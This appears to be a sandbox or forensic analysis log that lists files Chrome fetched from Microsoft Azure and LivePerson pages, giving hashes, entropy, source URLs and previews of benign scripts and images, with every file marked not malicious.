                                                                        Size (bytes):27332
                                                                        Entropy (8bit):5.48233759733871
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4502CFFD9A049B7D23CF17CC2DE9B80D
                                                                        SHA1:2150B19E2378B68F766A958A1408E599C556BE44
                                                                        SHA-256:2823FBFA7B9256867E21AF1ECBFBB98583C8EF0E0B495F6F01D862EF58E3D93D
                                                                        SHA-512:28CE499A0787323277957763ADE1B7F5341E547CF82ECE2E4B7CD4F35B250B48F87596CF2E580D7400FE5FB35D73493D932781E851E254753A61EF123EB2EA32
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lptag.liveperson.net/tag/tag.js?site=60270350
                                                                        Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag._tagv="4.1.13";!function(a,b){function c(c,d,e){b._logcnt=b._logcnt||0;H(c,d,e,b._logcnt);if("undefined"!=typeof a.lpTaglogListeners&&a.lpTaglogListeners.constructor===Array)for(var f=0;f<lpTaglogListeners.length;f++)try{lpTaglogListeners[f](c,d,e,b._logcnt)}catch(g){H("Exception="+g.message+" msg="+c,d,e,b._logcnt)}b._logcnt++}function d(a){if(a)for(var b=0;b<a.length;b++)qa[a[b].service]=a[b].baseURI}function e(){for(var a=Ga.PRODUCTION,c=b.ovr&&b.ovr.domain,d=0;d<Ha.length;d++)if(Ha[d].tagDomain===c){a=Ha[d].env;break}return a}function f(a){var c;a=a||e();if("string"==typeof a)for(var d=0;d<Ha.length;d++)if(Ha[d].env===a&&(b.tagletsPrecomputed&&Ha[d].tagletsPrecomputed||!b.tagletsPrecomputed&&!Ha[d].tagletsPrecomputed)){c=Ha[d].tagDomain;break}return c}function g(a){var b=qa[a],c="ALL";return b?b:qa[c]}function h(){return qa}function i(a){return l(ra,a)}function j(a){return l(sa,a)}function k(a,b){for(var c in b)b.h
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65397)
                                                                        Category:downloaded
                                                                        Size (bytes):140778
                                                                        Entropy (8bit):5.44675798903284
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:94FEEC31F6FD531C80B08FAE26EB275C
                                                                        SHA1:96F904FC6D751F8CFBA18D506CB1067CB0AC25FC
                                                                        SHA-256:1569DD95C870F769B2BC3909C52C08303956BEF7DFC288402D3B8BB13148BC10
                                                                        SHA-512:EBFC643C65EA79F4930AE22AA752C79252B91D97B0A5BB4407D262BAF76C2BA84A05D0064E095D4DFC9BBE727B38428FF1D741C045F0B5A85ED38ED0A1A3C3C3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.min.js
                                                                        Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var i,n=typeof globalThis!=n?globalThis:e||self,r={},e="__ms$mod__",a={},o=a.esm_ms_analytics_web_3_2_18={},c="3.2.18",u="oneDS3",s=(s=n)[u]=s[u]||{},l=(l=n)[u="oneDS"]=l[u]||{},n=s[e]=s[e]||{},f=n.v=n.v||[],u=l[e]=l[e]||{},d=u.v=u.v||[];for(i in(u.o=u.o||[]).push(a),t(r),r)s[i]=r[i],f[i]=c,l[i]=r[i],d[i]=c,(o.n=o.n||[]).push(i)}}(this,function(n){"use strict";!function(e,t,n){var i=Object.defineProperty;if(i)try{return i(e,t,n)}catch(r){}typeof n.value!==undefined&&(e[t]=n.value)}(n,"__esModule",{value:!0});var c="function",u="object",fe="undefined",f="prototype",s="hasOwnProperty",l=Object,g=l[f],v=l.assign,y=l.create,e=l.defineProperty,T=g[s],I=null;function b(e){e=!1===(e=void 0===e||e
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):315050
                                                                        Entropy (8bit):7.994617318431058
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:F1D68ADDDF56BF136FA5B19F6A5EE8DE
                                                                        SHA1:6AFD887B180BD379EF4359E90ECE05E0C1DE6018
                                                                        SHA-256:F8E52629AC9694960FD215F78BC99854DC0EFDF788B4DA6B1C793D6981CF8915
                                                                        SHA-512:4C1A46786BCE727F01DA82E2520625FA4743DA0C033C231B5CC6DE82E1AA930893555F52EB76A4182983A2686462305FCE8EF19F48FBBBE0ED4D0E9FD72826C8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8L..../.B...@l.F..e/........ ... !......-...7......~k...p.IF.^.w.y.')..^.'.F..M'..IhQ..*...|.....$...L....I...{!.%O..)..0s.%M.7e.Lf##i.....8.I=..}.C.N?.1.5.W.L,..R.h&I.H...r...;.V'.^j...$f.z......Tgb.@.!..d&..OeF.......5...\.VW2...N..K@N..!N2......./xCH........P%p.2.$...2X..0f.6...`V#.I.*?d$.[ ..4.l.gI.WU....u>..].U..........`.__.zW....MU....}...urV...6.........N..vU.2..Hv I......D4...N.H.....];{..m9.t....|.G.j......LZ-h..^I.^..(e.~.=....9.,.ED|Z./"...m.%.4.W....b...E..?....&.6.&..*..k,>..z..d...].j.~.....|......b>...'i+T..S)_M&S..&k&E..bE.....L..n...4...-F..H.v....2}..4=ZP.....w.(R..Xg.il.n...4.".)od.V.m.&H.?.A..}.."E..C.IKQ...'5..m..II%..%_.R..d.~). .......6+.H.........Q..>e.'...#..L..so#..(h...n"E./..D...FS..eu).....Q.....~X.........j..J..4..~.......>...T.EOY.]\*..c.+..H.Fr.I..N$......GP.B..C..=X].u..{d.~u.........!.uZ.i%h..>N.KZw*..K..C....R...<%..Ct;.4.......i...$.>.M.(..c.I....Hn...C....A....jW.W...!'..............
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x936, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:downloaded
                                                                        Size (bytes):162750
                                                                        Entropy (8bit):7.998814292342623
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:060BB11A3C5D1EB1968F40FF1D4EF573
                                                                        SHA1:06A89DF420E62867C36D51B1CCB6648B4B4FD3A3
                                                                        SHA-256:7CFFDBD0069DE6092F766421FE03CCFBB884BB22D244CEBC86367262486282C5
                                                                        SHA-512:CF53A2D4D6916E602352E41DAC63812E420ADA3833EBE708D70500BFCC047D4E1374BB01DE6A4871D7E47791D0861BF75184B2EE382FAD8120118854C03ECDBF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/resources-tab-3-2x?scl=1
                                                                        Preview:RIFF.{..WEBPVP8 .{..0....*....>...B!...G..q,......W........C.|......:.....................y.g....U.7....G.?...w.........U.y.g...?......W.......?....e............}.....c.m....._......C.........o........O.....O...................................?.................?.?.|..f.....'.......................e..?....9.....?.......?.......?......W..y.........Zz......=P.s.....?..........Q....o....~F|..S.2....>....+.{..(_..&........b/.........4^7?.".D.(.-.....,M.#.~X._..?..r...1...J...].:..Fd.9...5W.:...M........t..S<.:...s..(cOZ.<.....Y;../oK...@.;...[B...J..C..|...+.[ _....Q....~..V..}Q.Q.g]:..o..}.v.r4..K^..*.%....QG..b.+Z....{n.3[...e.....=...W.. ....a.....x./..p1g9QCp.B./.ME@.M.8l...n.9...A.v../...uC.....U.oD..fpx.P........v.I.?1...k.,k..W.....U......d..+.5+.1m.{..92.!S..#w1.;...)F.Ln$.H..N.....x.xt....B..<..#a...q.1/...C...`*.M..{..Y^R...C.|..w.[n...8.........+..s.M.t.og....=*^=..C.Qs.i}}..uR$gQ.8.y.....y..n....1......V..z...M.....C.)....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1578)
                                                                        Category:downloaded
                                                                        Size (bytes):344673
                                                                        Entropy (8bit):4.96730351838445
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C14F93E32185A9F2F08D1896BB19DE6E
                                                                        SHA1:9668A879A6142E6E75148E2CF41203177E0411B6
                                                                        SHA-256:68982E0A892E454C05AF6058360AE8BD06122E0195604C567C81AF99F113545A
                                                                        SHA-512:DC2B8DE6863363F94F5B193FB88870C6CB84C56F10F0A29F9AAFB3CFDE469F104630F57D2B1500D8B87081344D747E6293FF4A97A6C2D2B434EB4F92283BD5F7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static-assets.fs.liveperson.com/microsoft/lp_ada_enhancements-prod.js
                                                                        Preview:var engagementFix = (function () {. var engEl;.. function focus(eng) {. //Jaime MR test change setting upstream. // Run if a button was detected. if (eng.engagementType === 5) {. // Look in dom for a role of button. We only need to do this once because each button load will cause this to run.. setTimeout(function () {. var button = document.querySelector('[role="button"]');.. if (button) {. button.removeAttribute('role');. }. }, 200);. }.. if (eng.engagementType === 23) {. document.querySelectorAll('[data-LP-event="close"]')[0].click();. }.. engEl = document.getElementById('chatEngagement');.. if (engEl != null) {. setTimeout(function () {. document.getElementById('chatEngagement').focus();. }, 200);. } else {. setTimeout(function () {. var engageme
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (26038)
                                                                        Category:dropped
                                                                        Size (bytes):1075474
                                                                        Entropy (8bit):5.534428681365511
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A04F2FF29F634FD5E947FD4F3FBA03E9
                                                                        SHA1:717D9163AB90316733CDD9FDC37274F049CB5AFD
                                                                        SHA-256:452ADED02F6E123BC6057BBDF3FFE37EC3BC070DA98A8B38245B59939F329AAC
                                                                        SHA-512:58400AFF1729E84EBB23C218DAC8AD3602C81153B0D3BC47C0930DE0D21CB30BDF2CD0F0605143BD8BF0E6C0809B272D078A67427B9472F627FB35341D73F15C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:// Universal Media Player.// Build Date: 2024-12-10T18:10:35.199Z.// Commit: 457ba7eed109cd2eb5a13e7d89a84058a614b049.// Build Number: 20241210.01../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let U8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let O8=class{constructor(a,s,l,p){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):181462
                                                                        Entropy (8bit):7.997894503051134
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:FE74D29DF5E6D3A7EFC38BC80A674764
                                                                        SHA1:316FA2269536BD75EF8AFD1370E54F63CD1BE0F8
                                                                        SHA-256:C6246E4F5EF04150E10F8FBFE57E0B562DB860144162AF08C572C5863E518D22
                                                                        SHA-512:030C13EDF0CDE7AE1F11437F1F170B9071D3556D27DC1AB1286F74AF65360DB39F04750CAB2875379863C04D66277B2DF6F203A8B21209F806BCA05478E46353
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/321770-card-promo-image-media-2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=640&hei=1212&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.....f..w.....2...D.......~..."...EqH....Ir........Er"ve..l..n..K...(.....hM.b.,..o..U..%..L...\.r.W...}n.f,..*...C..T.....)......-P.2....,3.+d.4....$....W.Hx..B....h*z....J......b...f.0i.B.lU.7...I..kE..................KF;S.R..aC.....p2.)....@.@4.@.0..Lb..5....3p:Fy..7..8.<..+'>~....::....OA&.u..:..5i.p..`@-.=O8...CGh.F.....`...p.Vh....G`...#..Y....c...p.#.u.4q[2.TJK....(...F.0G.X..%.%.xx}835...k.N..\:ca8...sD...P.xh..&.....ET@a.W.~f...D&.!....q.....].:..Z.<..:...o.o...Hr&.Q4.[i..U..,...|..!...nA..\.g.d.[..[j,....{....@...fk...xF.R..3T..d.#......Mt*x6..@......(.O..X....H.3.e.......T.].S.G.........\.=...hVQ..1%....z.h$x.K.........<..$5.....,g.4r..01.0.)...v.>\.M.~ZU...N......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (801), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):801
                                                                        Entropy (8bit):4.508422040933604
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9351DBF05BD60CC9C833A8B4EDB42D62
                                                                        SHA1:ADAC4D7C8DA8DEE0142B3FBA79AA0918F24214D8
                                                                        SHA-256:B080C624DD458D5BF5B3FC6BE46CA23D8ECBE05D84A51D846B45A642638A9CFF
                                                                        SHA-512:D8ADB1BFE01977C68A4F9F2E6EB26D46E5D3A87CCB7A9FCBB3AB397E72A7F90B3028C60C29D016A941A9B5155760DD629913F840498FABEDBA88E3E17D5734E6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/domainprotection/refererrestrictions?cb=lpCb74457x11531
                                                                        Preview:lpCb74457x11531([{"enabled":true,"whiteList":["microsoft.com","*.microsoft.com","microsoftstore.com.cn","*.microsoftstore.com.cn","office.com","*.office.com","googleusercontent.com","bingplaces.com","translatoruser-int.com","liveperson.com","*.liveperson.com","liveperson.net","*.liveperson.net","lprnd.net","*.lprnd.net","lpsnmedia.net","*.lpsnmedia.net","static-assets.dev.fs.liveperson.com","*.azure.com","signup.azure.com","azure.com","*.moscnuat.com","*.lpnet.com","*.azurewebsites.net","*.geologic.al","*.microsoft365.com","microsoft365.com","checkout.microsoft365.com","stores.office.com","*.googleusercontent.com","*.bingplaces.com","*.translatoruser-int.com","lpnet.com","moscnuat.com","azurewebsites.net","geologic.al","*.checkout.microsoft365.com","*.stores.office.com"],"deleted":false}]);
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):2432
                                                                        Entropy (8bit):4.834130257531367
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F25FEC6821F63D701A6B6291A4011894
                                                                        SHA1:1260AC884282372B86F3A600BA8903AD75983E67
                                                                        SHA-256:DD8619BE444CCE5F8DB053215BB018C0BBC09AF7BAA9E66618BDF041B0A2E09C
                                                                        SHA-512:1F3C21E2C32DC8362A1CA12801FEC56BD22CDAF0BB7FB8D0D118348019EB843A63A171154BB0392DFEE268C5727F47CF139144596C0DFB7D12125CE659DB35C9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-click-group-telemetry.min.ACSHASHf25fec6821f63d701a6b6291a4011894.js
                                                                        Preview:/**. * Send telemetry data when a Click Group is clicked, if the clicked element. * is not the target/anchor/button itself.. */.(() => {. const ACTION_TYPES = {. LEFT_CLICK: 'CL'. };.. const EventName = {. CLICK: 'click'. };.. let analytics = null;.. /**. * Get dataBi attributes from an element's dataset. * @param {HTMLElement} element - The element to get dataBi attributes from. * @returns {Object} - An object containing the dataBi attributes. */. const getDataBi = (element) => {. if (!element || !element.dataset) {. return {};. }.. return Object.fromEntries(. Object.entries(element.dataset). .filter(([key]) => key.startsWith('bi') && key.charAt(2) === key.charAt(2).toUpperCase()). .map(([key, value]) => [. key.charAt(2).toLowerCase() + key.slice(3),. value. ]). );. };.. /**. * Send telemetry data to the analytics plugin. * @param {string} behaviorId - The behavior ID. * @param {string} actionTyp
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):160794
                                                                        Entropy (8bit):7.998363314589264
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:CD6028280C96C2D871ECF00C90666678
                                                                        SHA1:E850B68750EDF0183E3B660B8410FC44EB543F9B
                                                                        SHA-256:4AF5B9295FA1C98D003AC90EB81591370B708CEB041C0BA0B4E436726F599B6C
                                                                        SHA-512:8907331C375300607FC55DF3ADCAEADF1CFA1697CB217E4B9894BAF10A22F9502ED99F682B0C14EF31AF777D5C74485D1C31D025C774F43AB829BEF8031351A0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-data-transformation-tab-2-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............s....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................s.mdat.....&h.o.....2...D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):764
                                                                        Entropy (8bit):4.748770740207517
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:503CA3B5BE899CF0CC2DF72CF4586927
                                                                        SHA1:B9E1783FB87EA7F43B1CA766079B691C20F125B0
                                                                        SHA-256:DE55438B57B02B5A78B9F8DA24931A706B73294A84F1A37544B19334AF349AF8
                                                                        SHA-512:56D576990C9447E664EB9366ABF179C1516DB26FCC7DB4B1ED5A782D9523583091FA3C3A1EECFED7E94D0D12DD80EC17ACEC6516A41AC7F756854687E3DAC2FB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{. "ip": "8.46.123.175",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0500",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):178195
                                                                        Entropy (8bit):7.998523440154657
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:8F3AEE96A0857AACD6948431648951F8
                                                                        SHA1:4E11B924467F551625ACBDF669E3947512679512
                                                                        SHA-256:D7A5F8B20849C736175486BBF64168FA31C262A9DA17630DE9D50374006F88AE
                                                                        SHA-512:F1DEF10FE121943E41550F4BFD927CCAC0D76DFFB1F1B6F8DA51E3129CEDFED2E9B13CDDEDB957580495538EBA890F8AA87AA2041AE410D7E3DBBA56F855D80D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-data-transformation-tab-3-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.....&h.o.....2...D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 50 x 50, 8-bit/color RGBA, interlaced
                                                                        Category:dropped
                                                                        Size (bytes):2367
                                                                        Entropy (8bit):7.5299550710137
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2AEB948D16C1FC9DA76BEAA6880FD941
                                                                        SHA1:87004F5BC399B30ECB1219216A73A33D9DC1FEC6
                                                                        SHA-256:DB44263FED7B2A6FBEBD6356DB06EDCFB57914E84A2E40AD00E0C6B88E292AB2
                                                                        SHA-512:05EBA5C651EC6F992CDB3B713AE4E9342CB77C3C7DA2ACCFA876772CFF45596928F450D87BF8D3A06606EB4CD2F75C9823E3BBAF6470528906913AD93D42D548
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR...2...2.....i8.'....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:AF32A4F1283811E98FA7940DED6E639F" xmpMM:DocumentID="xmp.did:AF32A4F2283811E98FA7940DED6E639F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AF32A4EF283811E98FA7940DED6E639F" stRef:documentID="xmp.did:AF32A4F0283811E98FA7940DED6E639F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>B\gj....IDATx.b...?..NC.3.. ..h...DV....#D.}.../F.T.a`....+.....gv.,.............W.`l..<6/.Gv>......u.....B.\"M..!......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):406
                                                                        Entropy (8bit):4.645093417199183
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                        SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                        SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                        SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                        Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):80012
                                                                        Entropy (8bit):7.9919933841711455
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:16D71A4118A3BD59E15F56CF1C94B7C4
                                                                        SHA1:346308D295A944668EC2EEB8478AA9A7A827338A
                                                                        SHA-256:B33AF2EFB2AC98E23A4C55BF2D253AA6E71592B956D7428714760697070DA434
                                                                        SHA-512:3DA2874551F09F8318CC7F10409393B912B713D1D3CA1BF95F5BF9177372737DEE6C7D9BC399B67758A599935662906653ED02B2D4DF04E4B2044B93C37361BC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.8..WEBPVP8Lx8../?.Y..I.......!..."i.F.=...............O..W..n.7.n5....no@.yO..y...n[..b..<........H).}....G.j... .9E.+.v...'.>..$I(".j..;.......1.[....J..6.o..d..RE,.V..W.H[.X.af..@...JEf.}$QU.QU..\..HR..Y..[$...6.....].$q......N....ugJ..Lv........8...m.U21.9....M|Z..7....`G..Z..........A......$I...->...O....g.7....q...G......`.DUFZ.~`d. I..#..d...$.....P.......b...@..$I.....~......+..:)`..\.......0..3..1QHH.......&....WCJ.!...........!.........O.a. C.E..u...D..#..W.E ....1<;{...(c...Rk..(.2..X2W..7.u.....Q..s..m..........v\..V4.WB.. ..].@.x..=.\.N.@..W#(...{0P(....J..a....2.........}..F.Z..m#I...._..>w.D...O...;.?...?J...I.3.&...Yn...X?.....X...nk.........ut.~P?....Y....P-..<...k...q...y...k..3../.>\k.v...:%....!!$.K...3...<...K.M..9X..}St.R.I.0.3...tC...w....P...my......v.P...O.u}..x@.|....k.K.4.(.*...I.^...m......~.Aw.q.#.....}.PJkc..k%2.!....Y....`.....SW....i.q.,...N.?.'......[.G....G...X.DS.it=q..........m...~...0Pt...(QtG...@
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (541)
                                                                        Category:downloaded
                                                                        Size (bytes):3642
                                                                        Entropy (8bit):5.399452635270733
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                        SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                        SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                        SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-cookiecomp/v1.min.ACSHASHbe3f2a9f6a41fc40556efe260fc861a5.js
                                                                        Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
